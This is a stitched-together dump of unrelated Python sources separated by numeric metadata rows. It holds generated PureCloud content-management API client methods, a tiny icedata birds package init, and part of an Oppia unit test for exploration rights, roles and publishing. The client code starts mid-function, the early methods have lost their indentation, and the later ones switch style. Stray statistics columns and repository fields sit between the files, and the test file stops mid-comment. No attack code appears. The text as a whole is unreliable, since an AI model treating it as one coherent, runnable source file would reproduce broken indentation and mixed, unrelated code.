all_params = ['body', 'copy_source', 'move_source', 'override']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_documents" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_documents`")
resource_path = '/api/v2/contentmanagement/documents'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'copy_source' in params:
query_params['copySource'] = params['copy_source']
if 'move_source' in params:
query_params['moveSource'] = params['move_source']
if 'override' in params:
query_params['override'] = params['override']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Document',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_query(self, body, **kwargs):
"""
Query content
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_query(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param QueryRequest body: Allows for a filtered query returning facet information (required)
:param str expand: Expand some document fields
:return: QueryResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_query" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_query`")
resource_path = '/api/v2/contentmanagement/query'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QueryResults',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_shares(self, body, **kwargs):
"""
Creates a new share or updates an existing share if the entity has already been shared
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_shares(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param CreateShareRequest body: CreateShareRequest - entity id and type and a single member or list of members are required (required)
:return: CreateShareResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_shares" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_shares`")
resource_path = '/api/v2/contentmanagement/shares'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateShareResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_workspace_tagvalues(self, workspace_id, body, **kwargs):
"""
Create a workspace tag
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_workspace_tagvalues(workspace_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param TagValue body: tag (required)
:return: TagValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_workspace_tagvalues" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `post_contentmanagement_workspace_tagvalues`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_workspace_tagvalues`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagValue',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_workspace_tagvalues_query(self, workspace_id, body, **kwargs):
"""
Perform a prefix query on tags in the workspace
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_workspace_tagvalues_query(workspace_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param TagQueryRequest body: query (required)
:param list[str] expand: Which fields, if any, to expand.
:return: TagValueEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'body', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_workspace_tagvalues_query" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `post_contentmanagement_workspace_tagvalues_query`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_workspace_tagvalues_query`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues/query'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagValueEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_workspaces(self, body, **kwargs):
    """
    Create a group workspace.

    The request is synchronous by default. Pass a `callback` keyword
    argument to make it asynchronous; the callback is invoked with the
    response and the request thread is returned instead.

    :param WorkspaceCreate body: Workspace (required)
    :param callback function: callback for asynchronous requests (optional)
    :return: Workspace, or the request thread when called asynchronously
    """
    # Only the declared parameters plus the async `callback` are accepted.
    accepted_args = ['body', 'callback']
    params = locals()
    for arg_name, arg_value in iteritems(params['kwargs']):
        if arg_name not in accepted_args:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_contentmanagement_workspaces" % arg_name
            )
        params[arg_name] = arg_value
    del params['kwargs']

    # Required parameters must be present and non-None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_workspaces`")

    resource_path = '/api/v2/contentmanagement/workspaces'.replace('{format}', 'json')
    path_params = {}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')

    # Negotiate request/response content types with the API client.
    header_params['Accept'] = self.api_client.select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Workspace',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def put_contentmanagement_workspace(self, workspace_id, body, **kwargs):
    """
    Update a workspace.

    The request is synchronous by default. Pass a `callback` keyword
    argument to make it asynchronous; the callback is invoked with the
    response and the request thread is returned instead.

    :param str workspace_id: Workspace ID (required)
    :param Workspace body: Workspace (required)
    :param callback function: callback for asynchronous requests (optional)
    :return: Workspace, or the request thread when called asynchronously
    """
    # Only the declared parameters plus the async `callback` are accepted.
    accepted_args = ['workspace_id', 'body', 'callback']
    params = locals()
    for arg_name, arg_value in iteritems(params['kwargs']):
        if arg_name not in accepted_args:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method put_contentmanagement_workspace" % arg_name
            )
        params[arg_name] = arg_value
    del params['kwargs']

    # Required parameters must be present and non-None.
    if params.get('workspace_id') is None:
        raise ValueError("Missing the required parameter `workspace_id` when calling `put_contentmanagement_workspace`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `put_contentmanagement_workspace`")

    resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}'.replace('{format}', 'json')
    path_params = {'workspaceId': params['workspace_id']}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')

    # Negotiate request/response content types with the API client.
    header_params['Accept'] = self.api_client.select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']

    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Workspace',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def put_contentmanagement_workspace_member(self, workspace_id, member_id, body, **kwargs):
    """
    Add a member to a workspace.

    The request is synchronous by default. Pass a `callback` keyword
    argument to make it asynchronous; the callback is invoked with the
    response and the request thread is returned instead.

    :param str workspace_id: Workspace ID (required)
    :param str member_id: Member ID (required)
    :param WorkspaceMember body: Workspace Member (required)
    :param callback function: callback for asynchronous requests (optional)
    :return: WorkspaceMember, or the request thread when called asynchronously
    """
    # Only the declared parameters plus the async `callback` are accepted.
    accepted_args = ['workspace_id', 'member_id', 'body', 'callback']
    params = locals()
    for arg_name, arg_value in iteritems(params['kwargs']):
        if arg_name not in accepted_args:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method put_contentmanagement_workspace_member" % arg_name
            )
        params[arg_name] = arg_value
    del params['kwargs']

    # Required parameters must be present and non-None.
    if params.get('workspace_id') is None:
        raise ValueError("Missing the required parameter `workspace_id` when calling `put_contentmanagement_workspace_member`")
    if params.get('member_id') is None:
        raise ValueError("Missing the required parameter `member_id` when calling `put_contentmanagement_workspace_member`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `put_contentmanagement_workspace_member`")

    resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/members/{memberId}'.replace('{format}', 'json')
    path_params = {
        'workspaceId': params['workspace_id'],
        'memberId': params['member_id'],
    }
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')

    # Negotiate request/response content types with the API client.
    header_params['Accept'] = self.api_client.select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']

    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='WorkspaceMember',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def put_contentmanagement_workspace_tagvalue(self, workspace_id, tag_id, body, **kwargs):
    """
    Update a workspace tag. Will update all documents with the new tag value.

    The request is synchronous by default. Pass a `callback` keyword
    argument to make it asynchronous; the callback is invoked with the
    response and the request thread is returned instead.

    :param str workspace_id: Workspace ID (required)
    :param str tag_id: Tag ID (required)
    :param TagValue body: Workspace (required)
    :param callback function: callback for asynchronous requests (optional)
    :return: TagValue, or the request thread when called asynchronously
    """
    # Only the declared parameters plus the async `callback` are accepted.
    accepted_args = ['workspace_id', 'tag_id', 'body', 'callback']
    params = locals()
    for arg_name, arg_value in iteritems(params['kwargs']):
        if arg_name not in accepted_args:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method put_contentmanagement_workspace_tagvalue" % arg_name
            )
        params[arg_name] = arg_value
    del params['kwargs']

    # Required parameters must be present and non-None.
    if params.get('workspace_id') is None:
        raise ValueError("Missing the required parameter `workspace_id` when calling `put_contentmanagement_workspace_tagvalue`")
    if params.get('tag_id') is None:
        raise ValueError("Missing the required parameter `tag_id` when calling `put_contentmanagement_workspace_tagvalue`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `put_contentmanagement_workspace_tagvalue`")

    resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues/{tagId}'.replace('{format}', 'json')
    path_params = {
        'workspaceId': params['workspace_id'],
        'tagId': params['tag_id'],
    }
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')

    # Negotiate request/response content types with the API client.
    header_params['Accept'] = self.api_client.select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']

    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='TagValue',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
| 40.409568
| 260
| 0.556845
| 12,696
| 130,927
| 5.544266
| 0.028986
| 0.038869
| 0.021608
| 0.020514
| 0.931382
| 0.921466
| 0.9103
| 0.907316
| 0.899929
| 0.896093
| 0
| 0.000621
| 0.360193
| 130,927
| 3,239
| 261
| 40.422044
| 0.839676
| 0.25638
| 0
| 0.849942
| 0
| 0
| 0.207445
| 0.058135
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022596
| false
| 0
| 0.004056
| 0
| 0.049247
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b43df1d54134f3214c930f51e2e5bc4d91d09329
| 136
|
py
|
Python
|
icedata/datasets/birds/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
icedata/datasets/birds/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
icedata/datasets/birds/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
from icedata.datasets.birds.data import *
from icedata.datasets.birds.parser import *
from icedata.datasets.birds import trained_models
| 34
| 49
| 0.838235
| 19
| 136
| 5.947368
| 0.473684
| 0.292035
| 0.504425
| 0.637168
| 0.530973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 136
| 3
| 50
| 45.333333
| 0.91129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b44f0f907af65a256bf5da5cc4aa0d903df54279
| 14,025
|
py
|
Python
|
core/domain/rights_manager_test.py
|
VictoriaRoux/oppia
|
5ae2a7f0b5c85d6e28222844d22ebdbfb81923c6
|
[
"Apache-2.0"
] | 3
|
2015-03-17T01:34:14.000Z
|
2015-04-11T10:35:53.000Z
|
core/domain/rights_manager_test.py
|
VictoriaRoux/oppia
|
5ae2a7f0b5c85d6e28222844d22ebdbfb81923c6
|
[
"Apache-2.0"
] | null | null | null |
core/domain/rights_manager_test.py
|
VictoriaRoux/oppia
|
5ae2a7f0b5c85d6e28222844d22ebdbfb81923c6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for classes and methods relating to user rights."""
__author__ = 'Sean Lip'
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import rights_manager
import test_utils
class ExplorationRightsTests(test_utils.GenericTestBase):
    """Test that rights for actions on explorations work as expected."""

    def setUp(self):
        # Register five ordinary users (A-E) plus one admin, and cache
        # their user ids for use in the tests below.
        super(ExplorationRightsTests, self).setUp()
        self.signup('a@example.com', 'A')
        self.signup('b@example.com', 'B')
        self.signup('c@example.com', 'C')
        self.signup('d@example.com', 'D')
        self.signup('e@example.com', 'E')
        self.signup(self.ADMIN_EMAIL, username=self.ADMIN_USERNAME)

        self.user_id_a = self.get_user_id_from_email('a@example.com')
        self.user_id_b = self.get_user_id_from_email('b@example.com')
        self.user_id_c = self.get_user_id_from_email('c@example.com')
        self.user_id_d = self.get_user_id_from_email('d@example.com')
        self.user_id_e = self.get_user_id_from_email('e@example.com')
        self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL)

        self.set_admins([self.ADMIN_EMAIL])

        # Exploration id shared by the tests below.
        self.EXP_ID = 'exp_id'

    def test_demo_exploration(self):
        # A regular user may play/view/edit a demo exploration but not
        # delete it; the admin may additionally delete it.
        exp_services.load_demo('1')
        self.assertTrue(rights_manager.Actor(self.user_id_a).can_play('1'))
        self.assertTrue(rights_manager.Actor(self.user_id_a).can_view('1'))
        self.assertTrue(rights_manager.Actor(self.user_id_a).can_edit('1'))
        self.assertFalse(rights_manager.Actor(self.user_id_a).can_delete('1'))

        self.assertTrue(rights_manager.Actor(self.user_id_admin).can_play('1'))
        self.assertTrue(rights_manager.Actor(self.user_id_admin).can_view('1'))
        self.assertTrue(rights_manager.Actor(self.user_id_admin).can_edit('1'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_delete('1'))

    def test_non_splash_page_demo_exploration(self):
        # Note: there is no difference between permissions for demo
        # explorations, whether or not they are on the splash page.
        exp_services.load_demo('3')
        self.assertTrue(rights_manager.Actor(self.user_id_a).can_play('3'))
        self.assertTrue(rights_manager.Actor(self.user_id_a).can_view('3'))
        self.assertTrue(rights_manager.Actor(self.user_id_a).can_edit('3'))
        self.assertFalse(rights_manager.Actor(self.user_id_a).can_delete('3'))

        self.assertTrue(rights_manager.Actor(self.user_id_admin).can_play('3'))
        self.assertTrue(rights_manager.Actor(self.user_id_admin).can_view('3'))
        self.assertTrue(rights_manager.Actor(self.user_id_admin).can_edit('3'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_delete('3'))

    def test_ownership(self):
        # Granting an editor role does not confer ownership, and the
        # admin is not an owner either.
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)
        rights_manager.assign_role(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_EDITOR)

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).is_owner(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).is_owner(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_admin).is_owner(self.EXP_ID))

    def test_newly_created_exploration(self):
        # The creator of a private exploration has full rights; the admin
        # may play/view but not edit/delete it; a stranger has no rights.
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_play(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_edit(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_delete(self.EXP_ID))

        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_play(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_view(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_admin).can_edit(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_admin).can_delete(self.EXP_ID))

        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_edit(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_delete(self.EXP_ID))

    def test_inviting_collaborator(self):
        # An invited editor may play/view/edit but not delete.
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)
        rights_manager.assign_role(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_EDITOR)

        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_edit(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_delete(self.EXP_ID))

    def test_inviting_playtester(self):
        # Before being granted a role, user B has no rights; after being
        # made a viewer, B may play/view but still not edit/delete.
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_edit(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_delete(self.EXP_ID))

        rights_manager.assign_role(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_VIEWER)

        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_edit(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_delete(self.EXP_ID))

    def test_setting_rights(self):
        # Viewers and editors cannot assign roles; owners can, including
        # granting ownership, which then lets the new owner assign roles.
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        rights_manager.assign_role(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_VIEWER)
        with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
            rights_manager.assign_role(
                self.user_id_b, self.EXP_ID, self.user_id_c,
                rights_manager.ROLE_VIEWER)

        rights_manager.assign_role(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_EDITOR)
        with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
            rights_manager.assign_role(
                self.user_id_b, self.EXP_ID, self.user_id_c,
                rights_manager.ROLE_VIEWER)

        rights_manager.assign_role(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_OWNER)
        rights_manager.assign_role(
            self.user_id_b, self.EXP_ID, self.user_id_c,
            rights_manager.ROLE_OWNER)
        rights_manager.assign_role(
            self.user_id_b, self.EXP_ID, self.user_id_d,
            rights_manager.ROLE_EDITOR)
        rights_manager.assign_role(
            self.user_id_b, self.EXP_ID, self.user_id_e,
            rights_manager.ROLE_VIEWER)

    def test_publishing_and_unpublishing_exploration(self):
        # Publishing makes the exploration playable/viewable by anyone;
        # only the admin may unpublish, after which stranger B again has
        # no rights while the owner keeps play/view rights.
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)
        rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)

        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_a).can_unpublish(self.EXP_ID))

        rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_play(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))

    def test_cannot_delete_published_exploration(self):
        # Even the owner cannot delete an exploration while it is public.
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)
        rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
        self.assertFalse(
            rights_manager.Actor(self.user_id_a).can_delete(self.EXP_ID))

    def test_can_unpublish_and_delete_published_exploration(self):
        # Once the admin unpublishes it, the owner may delete it again.
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)
        rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
        rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_delete(self.EXP_ID))

    def test_cannot_unpublish_exploration_after_edited(self):
        # TODO: this scenario is not implemented yet.
        # User A creates an exploration, marks it private.
        # User A publishes the exploration.
        # User B submits a change.
        # User A cannot unpublish the exploration.
        pass

    def test_anyone_can_submit_a_fix(self):
        # TODO: this scenario is not implemented yet.
        # User A creates an exploration, marks it private.
        # User A submits a change.
        # User B submits a change.
        pass

    def test_can_publicize_exploration(self):
        # Only the admin, not the owner, may publicize a published
        # exploration.
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)
        rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)

        self.assertFalse(
            rights_manager.Actor(self.user_id_a).can_publicize(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_publicize(
                self.EXP_ID))

    def test_changing_viewability(self):
        # Only the owner and the admin may toggle private viewability, and
        # only while the exploration is private. Enabling it lets anyone
        # view the private exploration; disabling it revokes that again.
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))

        self.assertTrue(rights_manager.Actor(
            self.user_id_a).can_change_private_viewability(self.EXP_ID))
        self.assertFalse(rights_manager.Actor(
            self.user_id_b).can_change_private_viewability(self.EXP_ID))
        self.assertTrue(rights_manager.Actor(
            self.user_id_admin).can_change_private_viewability(self.EXP_ID))

        # Setting viewability to its current value, or by a non-owner, is
